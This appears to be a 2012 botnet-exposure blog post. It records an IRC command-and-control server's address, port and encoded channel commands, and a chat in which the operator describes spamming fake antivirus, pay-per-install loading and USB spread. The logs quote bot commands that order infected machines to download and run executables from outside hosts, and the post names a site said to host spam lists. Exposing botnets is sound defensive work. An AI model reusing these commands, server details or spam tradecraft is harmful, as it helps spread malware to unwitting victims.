w4hw5wg3488h.net (snk asper mod irc botnet hosted by Germany Karlsruhe 1&1 Internet Ag)

Resolved w4hw5wg3488h.net to

Server:  w4hw5wg3488h.net
Port:  5050
Channel:  #oh
Topic for #oh is: .d /100/97/111/124/120/46/47/39/99/103/96/69/126/115/101/62/113/111/115/62/100/124/57/61/39/57/60/23/40/61/47/33/12/63/52/35/42/41/17/103/8/85/63/104/127/118/39/98/107/73/77/
Topic for #oh set by s at Sat Dec 01 18:36:05 2012
Oper:  s!x@x

Talking with snk

<Userbased> hey
<s> sup
<Userbased> cool ircd mod
<s> yea
<Userbased> I like the link encryption as well
<Userbased> is this an asper mod?
<s> yea
<Userbased> is the spam built into the bot?
<Userbased> .s.on /100/97/111/124/49/59/47/127/124/127/58/64/127/122/102/114/119/114/112/112/114/116/101/34/124/103/104/10/115/103/52/117/91/109/ /100/97/111/124/49/59/47/127/124/127/58/64/127/122/102/114/119/114/112/112/114/116/101/34/124/103/104/10/ 204 f9555c
<Userbased> like that?
<s> no
<Userbased> oh
<Userbased> that would have been cool
<s> how u found that ip
<Userbased> how does being a zero access affilate work? I've never seen it check into a stats url
<Userbased> threatexpert
<s> its good with US installs
<s> how u know it was spam
<s> have u checked it out?
<Userbased> That was an old one. I found the exe for that
<Userbased> ran it and saw it look up MX records
<s> :)
<Userbased> is it your mail or sending for others?
<s> mine
<Userbased> I hear email still gives a good spread
<s> im not using it for spread
<s> i spam fakeav
<Userbased> Why not spam the bot then load the fakeav?
<Userbased> You could load other crap as well
<s> on US ; GB etc av loaded, on EU ppc
<s> and other ppi
<s> php script
<Userbased> ah, so it's a link, not a zip
<Userbased> makes sense
<s> its zip
<Userbased> but the link gives the zip right, it's not attached
<s> with downloader
<s> it goes to php script
<s> and php script gives the right exe
<Userbased> yes
<Userbased> same as with skype
<s> on skype not need to spread zip
<s> are u the guy from trojanforge?
<Userbased> you on there?
<Userbased> lol
<s> yes
<Userbased> why ngr with skype but this for here?
<s> i never used ngrbot
<Userbased> hmm
<s> i dont have anything todo with their ngrbot and skypespread
<s> im working alone
<Userbased> ok
<Userbased> you are snk right?
<Userbased> or do I have you mixed up?
<s> yes im snk
<Userbased> I see a snk on that server. They just stealing your name?
<s> yes
<Userbased> lame
<Userbased> so how do you spread? just spam?
<s> usb
<s> whats their server with snk inside?
<Userbased> http://www.exposedbotnets.com/2012/10/venustimeinfopl-ngrbot-irc-botnet.html
<Userbased> get.my.front sets mode +q #load snk
<Userbased> Oct 28 14:53:28 <snk> !dl hxxp://hotfile.com/dl/177749006/d16b55a/23y9bf927gfh.html
<s> hehehe funny guys :)
<Userbased> yes
<Userbased> Oct 28 15:03:24 * Received a CTCP TIME from snk (to #load)
<Userbased> Oct 28 15:03:28 * Received a CTCP VERSION from snk (to #load)
<Userbased> Oct 28 15:15:57 * Disconnected (Remote host closed socket).
<s> u have bots too?
<Userbased> too lazy to keep up with crypts and servers
<s> ok
<s> i lost whole net some days ago cos of spamhaus
<s> need to start again
<Userbased> java!java@team PRIVMSG n[USA|XP]2144220 :.dl hxxp://031919c.netsolhost.com/4531545.exe    Nov 05 21:12:02 * test (java@team) has left #load
<Userbased> no backup dns?
<s> no
<s> do u know fubar?
<Userbased> ngrbot coder?
<s> yes
<s> its aspermod too
<Userbased> So I hear
<Userbased> Lots of stuff seems to use the asper base
<Userbased> how did you choose the domain, just pound on the keyboard>
<Userbased> ?
<s> yes
<Userbased> why do you always host with 1&1? are they cheap and slow to takedown or something?
<s> idk
<s> i just bought them

Hosting infos: http://whois.domaintools.com/

now he’s spamming again
Topic for #lol is: .s.on /100/97/111/124/49/59/47/127/124/127/58/64/127/122/102/114/119/114/112/112/114/116/101/34/124/103/104/10/115/103/52/117/91/109/ /100/97/111/124/49/59/47/127/124/127/58/64/127/122/102/114/119/114/112/112/114/116/101/34/124/103/104/10/ 327 y7f6x
Topic for #lol set by postman at Sat Dec 01 23:53:40 2012

 His email lists are at http://www.chefbernards.com/ as 1 to 327.txt

Categories: Uncategorized